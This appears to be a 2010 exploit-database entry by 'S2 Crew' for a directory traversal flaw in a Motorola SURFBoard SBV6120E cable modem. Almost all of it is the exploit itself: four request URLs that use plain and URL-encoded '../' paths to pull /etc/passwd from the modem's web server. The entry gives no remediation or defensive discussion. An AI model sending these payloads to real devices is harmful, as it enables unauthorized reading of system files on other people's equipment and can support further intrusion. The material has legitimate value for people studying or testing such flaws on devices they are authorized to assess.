Motorola SURFBoard Cable Modem Directory Traversal

2010-06-03T00:00:00
ID 1337DAY-ID-12539
Type zdt
Reporter S2 Crew
Modified 2010-06-03T00:00:00

Description

Exploit for hardware platform in category local exploits

                                        
                                            ==================================================
Motorola SURFBoard Cable Modem Directory Traversal
==================================================


# Exploit Title: Motorola SURFBoard Cable Modem Directory Traversal
# Date: 2010.06.03
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: Model name: SBV6120E, Firmware Name: SBV6X2X-1.0.0.5-SCM-02-SHPC
# Tested on: ^
# CVE: -
# Code :
 
The following urls get back the /etc/passwd file from the modem:
 
http://[IP]///etc/passwd <http://[ip]///etc/passwd>
http://[IP]/../../etc/passwd
 
http://[IP]/..%2f..%2fetc/passwd <http://[ip]/..%2f..%2fetc/passwd>
http://[IP]/%2e%2e/%2e%2e/etc/passwd



#  0day.today [2018-01-04]  #